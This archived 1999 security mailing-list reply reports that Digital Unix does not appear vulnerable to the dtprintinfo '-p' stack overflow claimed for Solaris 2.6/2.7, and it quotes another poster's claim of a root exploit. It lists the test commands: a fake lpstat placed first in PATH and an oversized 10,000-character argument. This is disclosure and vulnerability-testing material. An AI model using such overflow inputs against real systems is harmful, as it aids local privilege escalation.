Re: Solaris2.6,2.7 dtprintinfo exploits

From: Lamont Granquist (lamontgat_private)
Date: Mon May 10 1999 - 13:13:29 PDT

    Digital Unix 4.0 through 4.0D w/BL11 (aka patch kit 3) does not appear to
    be vulnerable to this problem.  Tested with:
    
    % cat > lpstat
    echo "system for lpprn: server.com"
    ^D
    % chmod 755 lpstat
    % setenv PATH .:$PATH
    % /usr/dt/bin/dtprintinfo -p `perl -e '{ print "A" x 10000 }'`
    
    On Mon, 10 May 1999, UNYUN@ShadowPenguin wrote:
    > "dtprintinfo" is a suid program; the stack buffer can be overflowed by the '-p'
    > option. I made an exploit program that can get root for the Intel edition of
    > Solaris 2.6 and Solaris 2.7.
    
    
    
    --
    Lamont Granquist                       lamontgat_private
    Dept. of Molecular Biotechnology       (206)616-5735  fax: (206)685-7344
    Box 352145 / University of Washington / Seattle, WA 98195
    PGP pubkey: finger lamontgat_private | pgp -fka
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:32 PDT